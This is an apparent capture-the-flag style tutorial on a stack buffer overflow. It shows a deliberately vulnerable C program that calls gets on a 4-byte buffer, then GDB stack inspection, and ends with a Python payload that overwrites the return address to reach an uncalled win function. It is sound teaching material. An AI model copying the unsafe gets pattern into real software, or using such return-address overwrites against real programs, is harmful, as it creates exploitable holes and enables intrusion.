By abusing the leniency of some C functions when it comes to filling buffers with user-provided information, we can reach other restricted parts of the program, or even execute arbitrary code.
In this demonstration, we will see how a buffer is filled in the stack using the gets
function and how overflowing it will allow us the execute a function that should never be called otherwise in the program.
All the addresses used in the snippets and explanations are specific to the setup used to build this write-up. You will need to adapt them to your use-case in order to replicate the behaviour of this exploit.
Some useful GDB commands for the exercise:
(gdb) r
Run the program
(gdb) c
Continue the execution
(gdb) si
Step instruction
(gdb) b <func>
Place a breakpoint at <func>
(gdb) b b *0x000000000040118b
Place a breakpoint at given memory address
(gbd) i b
List breakpoints info
(gbd) d 1 2
Delete breakpoints 1 and 2
(gbd) d
Delete all breakpoints
(gdb) disas /r
Show the disassembly code of the current function. /r
adds the content of the program memory in hex form.
(gdb) x $rsp
Show the content of register $rsp
. The results shows the memory address inside the register and content at that address, such as 0x7fffffffd460: 0xffffd480
.
(gdb) x/16xw $rsp
Show the content of the memory starting at address $rsp
, for 16 words, in hex form.
(gdb) x/32xw 0x401160
Show the content of the memory starting at address 0x401160
, for 32 words, in hex form.
We will be working with this vulnerable snippet of code:
#include <stdio.h>
#define BUFSIZE 4
void win()
{
puts("If I am printed, I was hacked! because the program never called me!");
}
void vuln()
{
puts("Input a string and it will be printed back!");
char buf[BUFSIZE];
gets(buf);
puts(buf);
fflush(stdout);
}
int main(int argc, char **argv)
{
vuln();
return 0;
}
The problem lies in gets
that does not restrict nor checks the amount of data entered by the user. A safer alternative would be fgets
.
To compile it, use this gcc command: gcc vuln1.c -o vuln1 -fno-stack-protector -no-pie
The aim is to make it print the winning string, which is inside a function that is never called.
gets
simply write everything it gets inside its buffer. If we send too much information, that buffer will overflow and overwrite other information inside the stack. The aim is to overwrite a specific part of the stack with a particular address, so that we can make the program jump to the inaccessible function.
Using GDB, we can analyse how the program works and jump from one function to the other.
Run the program using GDB for the first time:
$ gdb ./vuln1
GNU gdb (GDB) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
[...]
Reading symbols from ./vuln1...
(No debugging symbols found in ./vuln1)
(gdb) r
Starting program: /home/dlh/dev/exploits/pico-CTF/primer-stack-overflow/vuln1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Input a string and it will be printed back!
hi:)
hi:)
[Inferior 1 (process 9621) exited normally]
(gdb)
Let us start by setting a breakpoint in the main
function and dump the code:
(gdb) b main
Breakpoint 1 at 0x4011a6
(gdb) r
Starting program: /home/dlh/dev/exploits/pico-CTF/primer-stack-overflow/vuln1
Breakpoint 1, 0x00000000004011a6 in main ()
(gdb) disas /r
Dump of assembler code for function main:
0x00000000004011a2 <+0>: 55 push %rbp
0x00000000004011a3 <+1>: 48 89 e5 mov %rsp,%rbp
=> 0x00000000004011a6 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x00000000004011aa <+8>: 89 7d fc mov %edi,-0x4(%rbp)
0x00000000004011ad <+11>: 48 89 75 f0 mov %rsi,-0x10(%rbp)
0x00000000004011b1 <+15>: b8 00 00 00 00 mov $0x0,%eax
0x00000000004011b6 <+20>: e8 a1 ff ff ff call 0x40115c <vuln>
0x00000000004011bb <+25>: b8 00 00 00 00 mov $0x0,%eax
0x00000000004011c0 <+30>: c9 leave
0x00000000004011c1 <+31>: c3 ret
End of assembler dump.
The structure of the disassembly dump is:
address <offset_from_function_start>: program_memory_content assembly_instructions
The call to the vuln
function happens at address 0x4011b6
and will make the program jump to 0x40115c
. In order to come back into the main
function when vuln
ends, the program will need to store the IP (instruction pointer) to that next instruction (address 0x4011bb
) somewhere.
Let's check the content of the IP at this point:
(gdb) x $rip
0x4011a6 <main+4>: 0x10ec8348
We have the address of the current instruction being executed and what's inside the memory at that address. Note that the content displayed is little endian, which is reversed compared to the way it's stored in the memory.
Let's progress up to the vuln
function call and then step into it:
(gdb) b *0x00000000004011b6
Breakpoint 2 at 0x4011b6
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004011b6 in main ()
(gdb) si
0x000000000040115c in vuln ()
(gdb) disas /r
Dump of assembler code for function vuln:
=> 0x000000000040115c <+0>: 55 push %rbp
0x000000000040115d <+1>: 48 89 e5 mov %rsp,%rbp
0x0000000000401160 <+4>: 48 83 ec 10 sub $0x10,%rsp
0x0000000000401164 <+8>: 48 8d 05 e5 0e 00 00 lea 0xee5(%rip),%rax # 0x402050
0x000000000040116b <+15>: 48 89 c7 mov %rax,%rdi
0x000000000040116e <+18>: e8 bd fe ff ff call 0x401030 <puts@plt>
0x0000000000401173 <+23>: 48 8d 45 fc lea -0x4(%rbp),%rax
0x0000000000401177 <+27>: 48 89 c7 mov %rax,%rdi
0x000000000040117a <+30>: b8 00 00 00 00 mov $0x0,%eax
0x000000000040117f <+35>: e8 bc fe ff ff call 0x401040 <gets@plt>
0x0000000000401184 <+40>: 48 8d 45 fc lea -0x4(%rbp),%rax
0x0000000000401188 <+44>: 48 89 c7 mov %rax,%rdi
0x000000000040118b <+47>: e8 a0 fe ff ff call 0x401030 <puts@plt>
0x0000000000401190 <+52>: 48 8b 05 91 2e 00 00 mov 0x2e91(%rip),%rax # 0x404028 <stdout@GLIBC_2.2.5>
0x0000000000401197 <+59>: 48 89 c7 mov %rax,%rdi
0x000000000040119a <+62>: e8 b1 fe ff ff call 0x401050 <fflush@plt>
0x000000000040119f <+67>: 90 nop
0x00000000004011a0 <+68>: c9 leave
0x00000000004011a1 <+69>: c3 ret
End of assembler dump.
We are now inside the vuln
function. The return address has been stored inside the Stack Pointer Register $rsp
(SP):
(gdb) x $rsp
0x7fffffffd468: 0x004011bb
0x004011bb
indeed corresponds to the instruction happening right after the call to vuln
in the main
function.
The SP points to the starts of the stack, which grows down from upper addresses to lower addresses. When the program needs to make space on its stack to store some variable (such as our 4-bytes buffer), the SP is moved down to a lower address.
Let's move the execution right before the gets
call:
(gdb) b *0x000000000040117f
Breakpoint 3 at 0x40117f
(gdb) c
Continuing.
Input a string and it will be printed back!
Breakpoint 3, 0x000000000040117f in vuln ()
If we print a chunk of the program stack from the position of the current position of SP:
(gdb) x/8xw $rsp
0x7fffffffd450: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffd460: 0xffffd480 0x00007fff 0x004011bb 0x00000000
We can spot the instruction pointer 0x004011bb
that we stored earlier, then we decremented the SP to make some space for our buffer.
We can also see the memory address 0x00007fffffffd480
where some other important information must be stored.
Let's advance to trigger the input prompt, write ABC
then check the stack again:
(gdb) b *0x0000000000401184
Breakpoint 4 at 0x401184
(gdb) c
Continuing.
ABC
Breakpoint 4, 0x0000000000401184 in vuln ()
(gdb) x/8xw $rsp
0x7fffffffd450: 0x00000000 0x00000000 0x00000000 0x00434241
0x7fffffffd460: 0xffffd480 0x00007fff 0x004011bb 0x00000000
The hex codes of ABC
is 0x41 0x42 0x43 0x00
, ending with a null character that also has to be stored (remember that the memory stores it in reverse order).
Now if we restart everything and input an entry that is too large for the buffer, we will overwrite important information on the stack and trigger a segmentation fault:
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dlh/dev/exploits/pico-CTF/primer-stack-overflow/vuln1
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Breakpoint 1, 0x00000000004011a6 in main ()
(gdb) c
Continuing.
Breakpoint 2, 0x00000000004011b6 in main ()
(gdb) c
Continuing.
Input a string and it will be printed back!
Breakpoint 3, 0x000000000040117f in vuln ()
(gdb) c
Continuing.
ABCDE
Breakpoint 4, 0x0000000000401184 in vuln ()
(gdb) x/8xw $rsp
0x7fffffffd450: 0x00000000 0x00000000 0x00000000 0x44434241
0x7fffffffd460: 0xffff0045 0x00007fff 0x004011bb 0x00000000
(gdb) c
Continuing.
ABCDE
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
We started by filling the area allocated to our buffer starting at address 0x7fffffffd450
with 0x41
for the letter A
, then at address 0x7fffffffd454
with 0x42
for the letter B
, ...
The letter E
(0x45
) and the end character (0x00
) must still be stored and the program simply keep moving up the stack to write those 1-byte words, overwriting the low-order part of the address 0x7fffffffd480
and changing it into 0x7fffffff0045
.
So the next time we will read that address and try to access its content, there is a good chance it will be outside out process address space, triggering a segmentation fault SIGSEGV
.
As we can overwrite the content of the stack, we could build an input (a payload) that would be large enough to cover the targeted 0x004011bb
and change it into the address of the function win
, so that when the vuln
function returns, instead of executing the instruction at 0x004011bb
in main
, we actually jump to the beginning of win
.
Using $ objdump -d ./vuln1
in a terminal, we can see that win
starts at address 401146
.
Using python, we can send a payload in hexadecimal form as such:
$ python -c 'print(12*"A"+"\x46\x11\x40\x00")' | ./vuln1
Input a string and it will be printed back!
AAAAAAAAAAAAF@
If I am printed, I was hacked! because the program never called me!
zsh: done python -c 'print(12*"A"+"\x46\x11\x40\x00")' |
zsh: segmentation fault (core dumped) ./vuln1
We print 12 times an arbitrary character A
, which is 4 times for the buffer, then 8 times to cover both 0xffffd480
and 0x00007fff
, then we append our address 0x00401146
in reverse order to overwrite the existing 0x004011bb
.
In the end we still have a segmentation fault due to the garbage we wrote in the stack, but we did manage to reach the win
function in the process.
- https://ccrma.stanford.edu/~jos/stkintro/Useful_commands_gdb.html
- https://primer.picoctf.org/#_binary_exploitation
- https://inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf
- https://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/FR%20-%20Stack%20Bug%20-%20Exploitation%20avancee%20de%20buffer%20overflow.pdf
- https://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%2064%20Bits%20Linux%20Stack%20Based%20Buffer%20Overflow.pdf --> Execution of arbitrary code.